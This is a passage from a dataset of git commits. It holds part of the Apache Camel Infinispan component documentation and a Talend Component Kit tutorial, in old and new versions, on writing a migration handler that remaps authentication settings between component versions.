| true | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe Infinispan endpoint is configured using URI syntax:\n\n----\ninfinispan:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The cache to use | | String\n|===\n\n\n=== Query Parameters (21 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *hosts* (common) | Specifies the host of the cache on Infinispan instance | | String\n| *queryBuilder* (common) | Specifies the query builder. | | InfinispanQueryBuilder\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *clusteredListener* (consumer) | If true, the listener will be installed for the entire cluster | false | boolean\n| *command* (consumer) | *Deprecated* The operation to perform. | PUT | String\n| *customListener* (consumer) | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *eventTypes* (consumer) | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | String\n| *sync* (consumer) | If true, the consumer will receive notifications synchronously | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. 
| PUT | InfinispanOperation\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheContainer* (advanced) | Specifies the cache Container to connect | | BasicCacheContainer\n| *cacheContainerConfiguration* (advanced) | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *configurationProperties* (advanced) | Implementation specific properties for the CacheManager | | Map\n| *configurationUri* (advanced) | An implementation specific URI for the CacheManager | | String\n| *flags* (advanced) | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | String\n| *remappingFunction* (advanced) | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *resultHeader* (advanced) | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 23 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.infinispan.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.infinispan.cache-container* | The default cache container. The option is a org.infinispan.commons.api.BasicCacheContainer type. | | String\n| *camel.component.infinispan.configuration.cache-container* | Specifies the cache Container to connect | | BasicCacheContainer\n| *camel.component.infinispan.configuration.cache-container-configuration* | The CacheContainer configuration. Uses if the cacheContainer is not defined. 
Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *camel.component.infinispan.configuration.clustered-listener* | If true, the listener will be installed for the entire cluster | false | Boolean\n| *camel.component.infinispan.configuration.configuration-properties* | Implementation specific properties for the CacheManager | | Map\n| *camel.component.infinispan.configuration.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.infinispan.configuration.custom-listener* | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *camel.component.infinispan.configuration.event-types* | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. <p\/> The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | Set\n| *camel.component.infinispan.configuration.flags* | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | Flag[]\n| *camel.component.infinispan.configuration.hosts* | Specifies the host of the cache on Infinispan instance | | String\n| *camel.component.infinispan.configuration.operation* | The operation to perform. | | InfinispanOperation\n| *camel.component.infinispan.configuration.query-builder* | Specifies the query builder. | | InfinispanQueryBuilder\n| *camel.component.infinispan.configuration.remapping-function* | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *camel.component.infinispan.configuration.result-header* | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *camel.component.infinispan.configuration.sync* | If true, the consumer will receive notifications synchronously | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.enabled* | Enable infinispan component | true | Boolean\n| *camel.component.infinispan.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. 
Only properties which are of String type can use property placeholders. | true | Boolean\n| *camel.component.infinispan.configuration.command* | *Deprecated* The operation to perform. | PUT | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"10%,10%,10%,10%,60%\",options=\"header\",]\n|=======================================================================\n|Name |Default Value |Type |Context |Description\n|CamelInfinispanCacheName |`null` |String |Shared |The cache participating in the operation or event.\n|CamelInfinispanOperation |`PUT` |InfinispanOperation |Producer |The operation to perform.\n|CamelInfinispanMap |`null` |Map |Producer |A Map to use in case of a CamelInfinispanOperationPutAll operation.\n|CamelInfinispanKey |`null` |Object |Shared |The key to perform the operation on, or the key generating the event.\n|CamelInfinispanValue |`null` |Object |Producer |The value to use for the operation.\n|CamelInfinispanEventType |`null` |String |Consumer |The type of the received event. Possible values are defined in org.infinispan.notifications.cachelistener.event.Event.Type.\n|CamelInfinispanIsPre |`null` |Boolean |Consumer |Infinispan fires two events for each operation: one before and one after the operation.\n|CamelInfinispanLifespanTime |`null` |long |Producer |The Lifespan time of a value inside the cache. Negative values are interpreted as infinity.\n|CamelInfinispanTimeUnit |`null` |String |Producer |The Time Unit of an entry Lifespan Time.\n|CamelInfinispanMaxIdleTime |`null` |long |Producer |The maximum amount of time an entry is allowed to be idle for before it is considered as expired.\n|CamelInfinispanMaxIdleTimeUnit |`null` |String |Producer |The Time Unit of an entry Max Idle Time.\n|CamelInfinispanQueryBuilder |null |InfinispanQueryBuilder |Producer |The QueryBuilder to use for the QUERY command; if not present, the command defaults to the InfinispanConfiguration's one.\n|CamelInfinispanIgnoreReturnValues |null |Boolean |Producer |If this header is set, the return value of a cache operation returning something is ignored by the client application.\n|CamelInfinispanOperationResultHeader |null |String |Producer |Store the operation result in a header instead of the message body.\n|=======================================================================\n\n== Examples\n\n* Retrieve a specific key from the default cache using a custom cache container:\n\n[source,java]\n----\nfrom(\"direct:start\")\n    .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n    .setHeader(InfinispanConstants.KEY).constant(\"123\")\n    .to(\"infinispan?cacheContainer=#cacheContainer\");\n----\n\n* Retrieve a specific key from a named cache:\n+\n[source,java]\n----\nfrom(\"direct:start\")\n    .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n    .setHeader(InfinispanConstants.KEY).constant(\"123\")\n    .to(\"infinispan:myCacheName\");\n----\n\n* Put a value with lifespan:\n\n[source,java]\n----\nfrom(\"direct:start\")\n    .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.PUT)\n    .setHeader(InfinispanConstants.KEY).constant(\"123\")\n    .setHeader(InfinispanConstants.VALUE).constant(\"123\")\n    .setHeader(InfinispanConstants.LIFESPAN_TIME).constant(100L)\n    .setHeader(InfinispanConstants.LIFESPAN_TIME_UNIT).constant(TimeUnit.MILLISECONDS.toString())\n    .to(\"infinispan:myCacheName\");\n----\n
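\n* Consume cache entry events from a named cache (a sketch; restricting to created entries via the `eventTypes` option is illustrative, and the headers used are those listed in the table above):\n+\n[source,java]\n----\nfrom(\"infinispan:myCacheName?eventTypes=CACHE_ENTRY_CREATED\")\n    .log(\"Received event ${header.CamelInfinispanEventType} for key ${header.CamelInfinispanKey}\");\n----\n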
\n* Compute operation through a remapping function on the default cache using a custom cache container:\n\n[source,java]\n----\n@BindToRegistry(\"mappingFunction\")\nBiFunction<String, String, String> comp = (k, v) -> v + \"replay\";\n\nfrom(\"direct:start\")\n    .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.COMPUTE)\n    .setHeader(InfinispanConstants.KEY).constant(\"123\")\n    .to(\"infinispan?cacheContainer=#cacheContainer&remappingFunction=#mappingFunction\");\n----\n\nThis will return oldValue + \"replay\".\n\nThis can also be done as an asynchronous operation, with the `InfinispanOperation.COMPUTEASYNC` operation.\n\n* Retrieve a specific key from the remote cache using a cache container configuration with additional parameters (host, port and protocol version):\n\n[source,java]\n----\norg.infinispan.client.hotrod.configuration.Configuration cacheContainerConfiguration = new org.infinispan.client.hotrod.configuration.ConfigurationBuilder()\n    .addServer()\n    .host(\"localhost\")\n    .port(9999)\n    .version(org.infinispan.client.hotrod.ProtocolVersion.PROTOCOL_VERSION_25)\n    .build();\n...\n\nfrom(\"direct:start\")\n    .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n    .setHeader(InfinispanConstants.KEY).constant(\"123\")\n    .to(\"infinispan?cacheContainerConfiguration=#cacheContainerConfiguration\");\n----\n\n\n== Using the Infinispan based idempotent repository\n\nIn this section we will use the Infinispan based idempotent repository.\n\nFirst, we need to create a cacheManager and then configure our\n`org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository`:\n\n[source,xml]\n----\n<!-- set up the cache manager -->\n<bean id=\"cacheManager\"\n class=\"org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\"\n destroy-method=\"stop\"\/>\n\n<!-- set up the repository -->\n<bean id=\"infinispanRepo\"\n class=\"org.apache.camel.component.infinispan.processor.idempotent.InfinispanIdempotentRepository\"\n factory-method=\"infinispanIdempotentRepository\">\n <argument ref=\"cacheManager\"\/>\n <argument value=\"idempotent\"\/>\n<\/bean>\n----\n\nThen we can use the Infinispan idempotent repository in a route defined in the Spring\nXML file as well (note that `messageIdRepositoryRef` must match the bean id of the repository):\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"InfinispanMessageIdRepositoryTest\">\n <from uri=\"direct:start\" \/>\n <idempotentConsumer messageIdRepositoryRef=\"infinispanRepo\">\n <header>messageId<\/header>\n <to uri=\"mock:result\" \/>\n <\/idempotentConsumer>\n <\/route>\n<\/camelContext>\n----\n\n== Using the Infinispan based route policy\n\n== See Also\n\n* Configuring Camel\n* Component\n* Endpoint\n* Getting Started\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01f1d1bbe77f640b7f9bb3b5d778e09b34c64f46","subject":"Fix typo","message":"Fix typo","repos":"chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime,chmyga\/component-runtime","old_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/tutorial-handle-talend-component-migration.adoc","new_file":"documentation\/src\/main\/antora\/modules\/ROOT\/pages\/tutorial-handle-talend-component-migration.adoc","new_contents":"= Handling component version migration\n:page-partial:\n\n[[tutorial-handle-talend-component-migration]]\n\nTalend Component Kit provides a migration mechanism between two versions of a component to let you ensure backward compatibility.\n\nFor example, a new version of a component may have some new options that need to be remapped, set with a default value in 
the older versions, or disabled.\n\nThis tutorial shows how to create a migration handler for a component that needs to be upgraded from version 1 to version 2. The upgrade to the newer version includes adding new options to the component.\n\nThis tutorial assumes that you know xref:methodology-creating-components.adoc[the basics] about component development and are familiar with component project xref:index-generating-project.adoc[generation] and xref:index-creating-components.adoc[implementation].\n\n== Requirements\n\nTo follow this tutorial, you need:\n\n* Java 8\n* A Talend component development environment using Talend Component Kit. Refer to xref:system-prerequisites.adoc[this document].\n* A generated project containing a simple processor component, created using the Talend Component Kit Starter.\n\n\n== Creating the version 1 of the component\nFirst, create a simple processor component configured as follows:\n\n1. Create a simple configuration class that represents a basic authentication and that can be used in any component requiring this kind of authentication. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"username\", \"password\" })\n})\npublic class BasicAuth {\n\n @Option\n @Documentation(\"username to authenticate\")\n private String username;\n\n @Option\n @Credential\n @Documentation(\"user password\")\n private String password;\n}\n----\n\n[start=\"2\"]\n. Create a simple output component that uses the configuration defined earlier. The component configuration is injected into the component constructor. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(1)\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final BasicAuth configuration;\n\n public MyOutput(@Option(\"configuration\") final BasicAuth configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n+\nNOTE: The version of the configuration class corresponds to the component version.\n\nBy configuring these two classes, the first version of the component is ready to use a simple authentication mechanism.\n\nNow, assuming that the component needs to support a new authentication mode following a new requirement, the next steps are:\n\n- Creating a version 2 of the component that supports the new authentication mode.\n- Handling migration from the first version to the new version.\n\n== Creating the version 2 of the component\nThe second version of the component needs to support a new authentication method and let the user choose the authentication mode to use from a dropdown list.\n\n. Add an Oauth2 authentication mode to the component in addition to the basic mode. For example: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"clientId\", \"clientSecret\" })\n})\npublic class Oauth2 {\n\n @Option\n @Documentation(\"client id to authenticate\")\n private String clientId;\n\n @Option\n @Credential\n @Documentation(\"client secret token\")\n private String clientSecret;\n}\n----\nThe options of the new authentication mode are now defined.\n\n[start=\"2\"]\n. Wrap the configuration created above in a global configuration with the basic authentication mode and add an enumeration to let the user choose the mode to use. 
For example, create an `AuthenticationConfiguration` class as follows: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"authenticationMode\" }),\n @GridLayout.Row({ \"basic\" }),\n @GridLayout.Row({ \"oauth2\" })\n})\npublic class AuthenticationConfiguration {\n\n @Option\n @Documentation(\"the authentication mode\")\n private AuthMode authenticationMode = AuthMode.Oauth2; \/\/ we set the default value to the new mode\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Basic\"})\n @Documentation(\"basic authentication\")\n private BasicAuth basic;\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Oauth2\"})\n @Documentation(\"oauth2 authentication\")\n private Oauth2 oauth2;\n\n\n \/**\n * This enum holds the authentication mode supported by this configuration\n *\/\n public enum AuthMode {\n Basic,\n Oauth2;\n }\n}\n----\n+\nTIP: Using the `@ActiveIf` annotation allows to activate the authentication type according to the selected authentication mode.\n\n[start=\"3\"]\n. Edit the component to use the new configuration that supports an additional authentication mode.\nAlso upgrade the component version from 1 to 2 as its configuration has changed. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(2) \/\/ upgrade the component version\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final AuthenticationConfiguration configuration; \/\/ use the new configuration\n\n public MyOutput(@Option(\"configuration\") final AuthenticationConfiguration configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n\nThe component now supports two authentication modes in its version 2.\nOnce the new version is ready, you can implement the migration handler that will take care of adapting the old configuration to the new one.\n\n== Handling the migration from the version 1 to the version 2\n\n*What can happen if an old configuration is passed to the new component version?*\n\nIt simply fails, as the version 2 does not recognize the old version anymore.\nFor that reason, a migration handler that adapts the old configuration to the new one is required.\nIt can be achieved by defining a migration handler class in the `@Version` annotation of the component class.\n\nNOTE: An old configuration may already be persisted by an application that integrates the version 1 of the component (Studio or web application).\n\n=== Declaring the migration handler\n\n. Add a migration handler class to the component version. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(value = 2, migrationHandler = MyOutputMigrationHandler.class)\n----\n\n[start=\"2\"]\n. Create the migration handler class `MyOutputMigrationHandler`. 
+\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{ <1>\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) { <2>\n \/\/ Here we will implement our migration logic to adapt the version 1 of the component to the version 2\n return incomingData;\n }\n }\n----\n+\n<1> The migration handler class needs to implement the `MigrationHandler` interface.\n<2> The `MigrationHandler` interface specifies the `migrate` method. This method references: +\n+\n- the incoming version, which is the version of the configuration that we are migrating from\n- a map (key, value) of the configuration, where the key is the configuration path and the value is the value of the configuration.\n\n=== Implementing the migration handler\n\nNOTE: You need to be familiar with the component configuration path construction to better understand this part.\nRefer to xref:component-configuration.adoc[Defining component layout and configuration].\n\nAs a reminder, the following changes were made since the version 1 of the component:\n\n- The configuration `BasicAuth` from the version 1 is not the root configuration anymore, as it is under `AuthenticationConfiguration`.\n- `AuthenticationConfiguration` is the new root configuration.\n- The component supports a new authentication mode (Oauth2) which is the default mode in the version 2 of the component.\n\nTo migrate the old component version to the new version and to keep backward compatibility, you need to:\n\n- Remap the old configuration to the new one.\n- Give the adequate default values to some options.\n\nIn the case of this scenario, it means making all configurations based on the version 1 of the component have the `authenticationMode` set to basic by default and remapping the old basic authentication configuration to the new one.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) {\n if(incomingVersion == 1){ <1>\n \/\/ remapping the old configuration <2>\n String userName = incomingData.get(\"configuration.username\");\n String password = incomingData.get(\"configuration.password\");\n incomingData.put(\"configuration.basic.username\", userName);\n incomingData.put(\"configuration.basic.password\", password);\n\n \/\/ setting default value for authenticationMode to Basic <3>\n incomingData.put(\"configuration.authenticationMode\", \"Basic\");\n }\n\n return incomingData; <4>\n }\n }\n----\n\n<1> Safety check of the incoming data version to make sure to only apply the migration logic to the version 1.\n<2> Mapping the old configuration to the new version structure. 
As the `BasicAuth` is now under the root configuration class, its path changes and becomes `configuration.basic.*`.\n<3> Setting a new default value to the `authenticationMode` as it needs to be set to `Basic` for configuration coming from version 1.\n<4> Returning the new configuration data.\n\nTIP: if a configuration has been renamed between 2 component versions, you can get the old configuration option from the configuration map by using its old path and set its value using its new path.\n\nYou can now upgrade your component without losing backward compatibility.\n","old_contents":"= Handling component version migration\n:page-partial:\n\n[[tutorial-handle-talend-component-migration]]\n\nTalend Component Kit provides a migration mechanism between two versions of a component to let you ensure backward compatibility.\n\nFor example, a new version of a component may have some new options that need to be remapped, set with a default value in the older versions, or disabled.\n\nThis tutorial shows how to create a migration handler for a component that needs to be upgraded from a version 1 to a version 2. The upgrade to the newer version includes adding new options to the component.\n\nThis tutorial assumes that you know xref:methodology-creating-components.adoc[the basics] about component development and are familiar with component project xref:index-generating-project.adoc[generation] and xref:index-creating-components.adoc[implementation].\n\n== Requirements\n\nTo follow this tutorial, you need:\n\n* Java 8\n* A Talend component development environment using Talend Component Kit. Refer to xref:system-prerequisites.adoc[this document].\n* Have generated a project containing a simple processor component using the Talend Component Kit Starter.\n\n\n== Creating the version 1 of the component\nFirst, create a simple processor component configured as follows:\n\n1. Create a simple configuration class that represents a basic authentication and that can be used in any component requiring this kind of authentication. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"username\", \"password\" })\n})\npublic class BasicAuth {\n\n @Option\n @Documentation(\"username to authenticate\")\n private String username;\n\n @Option\n @Credential\n @Documentation(\"user password\")\n private String password;\n}\n----\n\n[start=\"2\"]\n. Create a simple output component that uses the configuration defined earlier. The component configuration is injected into the component constructor. 
+\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(1)\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final BasicAuth configuration;\n\n public MyOutput(@Option(\"configuration\") final BasicAuth configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n+\nNOTE: The version of the configuration class corresponds to the component version.\n\nBy configuring these two classes, the first version of the component is ready to use a simple authentication mechanism.\n\nNow, assuming that the component needs to support a new authentication mode following a new requirement, the next steps are:\n\n- Creating a version 2 of the component that supports the new authentication mode.\n- Handling migration from the first version to the new version.\n\n== Creating the version 2 of the component\nThe second version of the component needs to support a new authentication method and let the user choose the authentication mode he wants to use using a dropdown list.\n\n. Add an Oauth2 authentication mode to the component in addition to the basic mode. For example: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"clientId\", \"clientSecret\" })\n})\npublic class Oauth2 {\n\n @Option\n @Documentation(\"client id to authenticate\")\n private String clientId;\n\n @Option\n @Credential\n @Documentation(\"client secret token\")\n private String clientSecret;\n}\n----\nThe options of the new authentication mode are now defined.\n\n[start=\"2\"]\n. Wrap the configuration created above in a global configuration with the basic authentication mode and add an enumeration to let the user choose the mode to use. For example, create an `AuthenticationConfiguration` class as follows: +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@GridLayout({\n @GridLayout.Row({ \"authenticationMode\" }),\n @GridLayout.Row({ \"basic\" }),\n @GridLayout.Row({ \"oauth2\" })\n})\npublic class AuthenticationConfiguration {\n\n @Option\n @Documentation(\"the authentication mode\")\n private AuthMode authenticationMode = AuthMode.Oauth2; \/\/ we set the default value to the new mode\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Basic\"})\n @Documentation(\"basic authentication\")\n private BasicAuth basic;\n\n @Option\n @ActiveIf(target = \"authenticationMode\", value = {\"Oauth2\"})\n @Documentation(\"oauth2 authentication\")\n private Oauth2 oauth2;\n\n\n \/**\n * This enum holds the authentication mode supported by this configuration\n *\/\n public enum AuthMode {\n Basic,\n Oauth2;\n }\n}\n----\n+\nTIP: Using the `@ActiveIf` annotation allows to activate the authentication type according to the selected authentication mode.\n\n[start=\"3\"]\n. Edit the component to use the new configuration that supports an additional authentication mode.\nAlso upgrade the component version from 1 to 2 as its configuration has changed. 
+\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(2) \/\/ upgrade the component version\n@Icon(Icon.IconType.DEFAULT)\n@Processor(name = \"MyOutput\")\n@Documentation(\"A simple output component\")\npublic class MyOutput implements Serializable {\n\n private final AuthenticationConfiguration configuration; \/\/ use the new configuration\n\n public MyOutput(@Option(\"configuration\") final AuthenticationConfiguration configuration) {\n this.configuration = configuration;\n }\n\n @ElementListener\n public void onNext(@Input final JsonObject record) {\n }\n}\n----\n\nThe component now supports two authentication modes in its version 2.\nOnce the new version is ready, you can implement the migration handler that will take care of adapting the old configuration to the new one.\n\n== Handling the migration from the version 1 to the version 2\n\n*What can happen if an old configuration is passed to the new component version?*\n\nIt simply fails, as the version 2 does not recognize the old version anymore.\nFor that reason, a migration handler that adapts the old configuration to the new one is required.\nIt can be achieved by defining a migration handler class in the `@Version` annotation of the component class.\n\nNOTE: An old configuration may already be persisted by an application that integrates the version 1 of the component (Studio or web application).\n\n=== Declaring the migration handler\n\n. Add a migration handler class to the component version. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n@Version(value = 1, migrationHandler = MyOutputMigrationHandler.class)\n----\n\n[start=\"2\"]\n. Create the migration handler class `MyOutputMigrationHandler`. +\n+\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{ <1>\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) { <2>\n \/\/ Here we will implement our migration logic to adapt the version 1 of the component to the version 2\n return incomingData;\n }\n }\n----\n+\n<1> The migration handler class needs to implement the `MigrationHandler` interface.\n<2> The `MigrationHandler` interface specifies the `migrate` method. 
This method references: +\n+\n- the incoming version, which is the version of the configuration that we are migrating from\n- a map (key, value) of the configuration, where the key is the configuration path and the value is the value of the configuration.\n\n=== Implementing the migration handler\n\nNOTE: You need to be familiar with the component configuration path construction to better understand this part.\nRefer to xref:component-configuration.adoc[Defining component layout and configuration].\n\nAs a reminder, the following changes were made since the version 1 of the component:\n\n- The configuration `BasicAuth` from the version 1 is not the root configuration anymore, as it is under `AuthenticationConfiguration`.\n- `AuthenticationConfiguration` is the new root configuration.\n- The component supports a new authentication mode (Oauth2) which is the default mode in the version 2 of the component.\n\nTo migrate the old component version to the new version and to keep backward compatibility, you need to:\n\n- Remap the old configuration to the new one.\n- Give the adequate default values to some options.\n\nIn the case of this scenario, it means making all configurations based on the version 1 of the component have the `authenticationMode` set to basic by default and remapping the old basic authentication configuration to the new one.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n public class MyOutputMigrationHandler implements MigrationHandler{\n\n @Override\n public Map<String, String> migrate(final int incomingVersion, final Map<String, String> incomingData) {\n if(incomingVersion == 1){ <1>\n \/\/ remapping the old configuration <2>\n String userName = incomingData.get(\"configuration.username\");\n String password = incomingData.get(\"configuration.password\");\n incomingData.put(\"configuration.basic.username\", userName);\n incomingData.put(\"configuration.basic.password\", password);\n\n \/\/ setting default value for authenticationMode to Basic <3>\n incomingData.put(\"configuration.authenticationMode\", \"Basic\");\n }\n\n return incomingData; <4>\n }\n }\n----\n\n<1> Safety check of the incoming data version to make sure to only apply the migration logic to the version 1.\n<2> Mapping the old configuration to the new version structure. 
As the `BasicAuth` is now under the root configuration class, its path changes and becomes `configuration.basic.*`.\n<3> Setting a new default value to the `authenticationMode` as it needs to be set to `Basic` for configuration coming from version 1.\n<4> Returning the new configuration data.\n\nTIP: if a configuration has been renamed between 2 component versions, you can get the old configuration option from the configuration map by using its old path and set its value using its new path.\n\nYou can now upgrade your component without losing backward compatibility.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} 